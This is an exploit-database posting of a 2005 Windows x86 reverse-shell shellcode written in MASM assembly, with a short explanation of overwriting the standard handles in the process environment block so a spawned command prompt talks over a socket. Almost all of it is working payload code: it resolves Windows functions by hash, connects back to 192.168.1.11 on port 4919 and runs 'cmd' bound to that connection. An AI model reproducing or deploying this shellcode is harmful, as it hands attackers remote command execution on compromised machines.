https://www.exploit-db.com/exploits/13524

漏洞细节尚未披露

We use the PEB for the Output/Input/Error Handles.

typedef struct PEB
BOOLEAN InheritedAddressSpace ;
BOOLEAN ReadImageFileExecOptions ;
BOOLEAN BeingDebugged ;
BOOLEAN Spare ;
HANDLE Mutant ;
PVOID ImageBaseAddress ;
PPEB LDR DATA LoaderData ;
PRTL USER PROCESS PARAMETERS ProcessParameters ;
...
typedef struct RTL USER PROCESS PARAMETERS
ULONG MaximumLength ;
ULONG Length ;
ULONG Flags ;
ULONG DebugFlags ;
PVOID ConsoleHandle ;
ULONG ConsoleFlags ;
HANDLE StdInputHandle ; +18h
HANDLE StdOutputHandle ; +1Ch
HANDLE StdErrorHandle ; +20h
...

So with the nooil tricks we have now :
mov eax,dword ptr fs :[18h]
mov eax,dword ptr ds :[eax+30h]
mov eax,dword ptr ds :[eax+10h]
mov ecx, hClientSocket
mov dword ptr ds :[eax+18h],ecx ; SetStdHandle(STD INPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+1Ch],ecx ; SetStdHandle(STD OUTPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+20h],ecx ; SetStdHandle(STD ERROR HANDLE,hClientSocket) ;

249 bytes Reverse Generic Shellcode without loader(no null byte) :

comment *
-----------------------------------------------------------------
---- New generation shellcode using my "nooil tricks" methods ---
----    (c) 2005 - Matthieu Suiche / [email protected]        ---
249 bytes Reverse Generic Shellcode without loader(no null byte)
-----------------------------------------------------------------
hehe hi metasploit's guys ;)
*
.386
.model flat, stdcall

assume fs:nothing

LoadLibraryA    equ 0D6C3D898h
WSAStartupA     equ 0C7B3B4CBh
WSASocketA      equ 0B8ACB6C6h
connect                 equ 06EE2D2C8h
system                  equ 0E873E6D8h
ExitProcessA    equ 0D7D8EA95h
; ------------------------------
sin_addr                equ 0B01A8C0h ; 192.168.1.11
sin_port                equ 3713h       ; 4919
; ------------------------------
str_cmd                 equ 0FF646D63h

; ----------------------------------------------------
_nooil_ segment public ; writable section
;.
; ----- CODE -----
scode:
       jmp short _eip
       GetEip:
       pop             edi
       jmp short EntryPoint
_eip:
       call    GetEip
Kernel32BaseAddr:
       pushad
       test    eax, eax
       jnz             MyGetProcAddr
       ; eax = 0
       mov     eax, dword ptr fs:[eax+30h]
       mov     eax, dword ptr ds:[eax+0ch]
       mov     esi, dword ptr ds:[eax+1ch]
       lodsd
       mov     eax, dword ptr ds:[eax+08h]
MyGetProcAddr:
       mov             edx, eax

; - PE
       add             edx, dword ptr ds:[edx+3ch]

; - Export Table
       mov             edx, dword ptr ds:[edx+78h]
       add             edx, eax

       mov     ebx, dword ptr ds:[edx+20h]
       add             ebx, eax

       xor             ecx, ecx
       mov             ebp, eax

FindAddr:
       inc             ecx
       mov     edi, dword ptr ds:[ebx+ecx*4]
       add             edi, eax

       mov             esi, dword ptr [edi]
       add             esi, dword ptr [edi+4]
       cmp             esi, [esp+36]
       jz              AddrFound
       jmp             short FindAddr

AddrFound:

       mov     ebx, dword ptr ds:[edx+24h]
       add     ebx, ebp
       mov     cx,word ptr ds:[ebx+ecx*2]

       mov     ebx, dword ptr ds:[edx+1Ch]
       add     ebx, ebp
       add     ebp, dword ptr ds:[ebx+ecx*4]

       mov             dword ptr [esp+28], ebp
       popad
       retn

EntryPoint:
       xor             eax, eax
       xor             ecx, ecx
       push    LoadLibraryA
       call    edi                                                     ; MyGetProcAddr(LoadLibraryA);
       mov             ebp, eax

       push    cx
       push    word ptr '23'
       push    '_2sw'
       push    esp
       call    eax             ; LoadLibraryA("ws2_32");

       mov             ebx, eax

       push    WSAStartupA
       call    edi             ; MyGetProcAddr(WSAStartupA)


       mov             esi, esp
       add             si, -301h
       push    esi
       push    2
       call    eax             ; WSAStartup(2,&WSAstruct);

       mov             eax, ebx

       push    WSASocketA
       call    edi             ; MyGetProcAddr(WSASocketA);

       xor             esi, esi
       push    esi
       push    esi
       push    esi
       push    esi
       inc             esi
       push    esi
       inc             esi
       push    esi
       call    eax             ; WSASocket(2,1,0,0,0,0);

       xchg    ebx, eax ; ebx = sockfd , eax = ws2_32

       push    sin_addr
       push    word ptr sin_port
       push    si
       mov             esi, esp

       push    connect
       call    edi             ; MyGetProcAddr(connect)

       push    10h
       push    esi
       push    ebx
       call    eax             ; connect(sockfd, &struct, sizeof(struct));

       push    ax
       push    word ptr 'tr'
       push    'cvsm'
       push    esp
       call    ebp             ; LoadLibraryA("msvcrt");

       push    system
       call    edi             ; MyGetProcAddr(system);

       ; ----------------------------- nooil tricks ----------------------------------
       xor             ecx, ecx
       mov             ecx,dword ptr fs:[ecx+18h]
       mov             ecx,dword ptr ds:[ecx+30h]
       mov             ecx,dword ptr ds:[ecx+10h]
       mov             dword ptr ds:[ecx+18h],ebx ; SetStdHandle(STD_INPUT_HANDLE,hClient);
       mov     dword ptr ds:[ecx+1Ch],ebx ; SetStdHandle(STD_OUTPUT_HANDLE,hClient);
       mov     dword ptr ds:[ecx+20h],ebx ; SetStdHandle(STD_ERROR_HANDLE,hClient);
       ; -----------------------------------------------------------------------------


       push    str_cmd
       inc             byte ptr [esp+3]
       push    esp
       call    eax     ; system("cmd");

       ; Exit
       push    ExitProcessA
       call    edi             ; MyGetProcAddr(ExitProcessA)
       call    eax             ; ExitProcessA();
end scode
; ------ END CODE ------
;.
_nooil_ ends
; ----------------------------------------------------

; milw0rm.com [2005-08-16]